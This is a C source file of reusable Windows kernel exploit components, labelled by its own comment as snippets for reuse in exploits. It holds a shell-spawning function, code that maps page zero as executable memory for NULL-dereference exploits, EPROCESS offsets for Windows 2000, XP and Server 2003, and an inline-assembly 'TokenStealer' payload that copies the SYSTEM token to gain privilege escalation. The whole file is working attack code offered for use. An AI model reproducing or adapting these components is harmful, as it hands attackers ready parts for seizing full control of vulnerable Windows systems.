snippets.c

/*
 * C code snippets for reuse in exploits
 */

/*
 * A version of puts() that doesn't require CRT
 */
static void __puts(const char *text)
{
    DWORD charsWritten;
    WriteConsoleA(GetStdHandle(STD_OUTPUT_HANDLE), text, strlen(text), &charsWritten, NULL);
}

/*
 * vsprintf() function from ntdll.
 */
typedef int (__cdecl *pvsprintf)(char *buffer, const char *format, va_list argptr); 
pvsprintf vsprintf; 

/*
 * A version of printf() that doesn't require CRT
 */
static int __printf(const char *fmt, ...)
{
    char buffer[1024];
    int length;
    DWORD charsWritten;
    va_list args;

    va_start(args, fmt);
    length = vsprintf(buffer, fmt, args);
    WriteConsoleA(GetStdHandle(STD_OUTPUT_HANDLE), buffer, length, &charsWritten, NULL);
    va_end(args);
    return length;
}

/*
 * Simply spawn a CMD shell.
 */
static int SpawnCmd(void)
{
	STARTUPINFOA StartInfo;
	PROCESS_INFORMATION ProcInfo;
    char ComSpec[128];
    BOOL Success;

    if (GetEnvironmentVariableA("ComSpec", ComSpec, sizeof(ComSpec)) == 0) {
        return FALSE;
    }

    memset(&StartInfo, 0, sizeof(StartInfo));
    StartInfo.cb = sizeof(StartInfo);
	Success = CreateProcessA(
		NULL,
		ComSpec,
		NULL,
		NULL,
		TRUE,
		CREATE_NEW_CONSOLE,
		NULL,
		NULL,
		&StartInfo,
		&ProcInfo);
    return Success;
}

/*
 * Allocate page zero
 */
static NTSTATUS MapPageZero(SIZE_T Size)
{
	PVOID BaseAddress = (PVOID)1;

	return NtAllocateVirtualMemory((PVOID)-1, &BaseAddress, 0, &Size, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
}


#define NTVER(maj, min, csd) ((maj << 24) | (min << 16) | (csd << 8))
// Windows 2000 SP4 UR1
#define NTOS_TARGET_VER NTVER(5,0,4)
// Windows XP SP3
//#define NTOS_TARGET_VER NTVER(5,1,3)
// Windows Server 2003 R2 SP2
//#define NTOS_TARGET_VER NTVER(5,2,2)

#if (NTOS_TARGET_VER == NTVER(5,0,4))

#define SYSTEM_PID 8
#define OFFSET_KPCR_KTHREAD 0x124
#define OFFSET_KTHREAD_KPROCESS 0x44
#define OFFSET_EPROCESS_UNIQUEPID 0x9C
#define OFFSET_EPROCESS_APLINKS 0xA0
#define OFFSET_EPROCESS_TOKEN 0x12C

#elif (NTOS_TARGET_VER == NTVER(5,1,3))

#define SYSTEM_PID 4
#define OFFSET_KPCR_KTHREAD 0x124
#define OFFSET_KTHREAD_KPROCESS 0x44
#define OFFSET_EPROCESS_UNIQUEPID 0x84
#define OFFSET_EPROCESS_APLINKS 0x88
#define OFFSET_EPROCESS_TOKEN 0xC8

#elif (NTOS_TARGET_VER == NTVER(5,2,2))

#define SYSTEM_PID 4
#define OFFSET_KPCR_KTHREAD 0x124
#define OFFSET_KTHREAD_KPROCESS 0x128
#define OFFSET_EPROCESS_UNIQUEPID 0x94
#define OFFSET_EPROCESS_APLINKS 0x98
#define OFFSET_EPROCESS_TOKEN 0xD8

#else
#error Please define NTOS_TARGET_VER.
#endif

static void TokenStealer(void)
{
    __asm {
        mov   eax, fs:[OFFSET_KPCR_KTHREAD]
        mov   eax, [eax + OFFSET_KTHREAD_KPROCESS]
        push  eax

aplinks_loop:
        mov   eax, [eax + OFFSET_EPROCESS_APLINKS]
        lea   eax, [eax - OFFSET_EPROCESS_APLINKS]
        cmp   dword ptr [eax + OFFSET_EPROCESS_UNIQUEPID], SYSTEM_PID
        jne   aplinks_loop

        mov   eax, [eax + OFFSET_EPROCESS_TOKEN]
        pop   edx
        mov   [edx + OFFSET_EPROCESS_TOKEN], eax
    }
}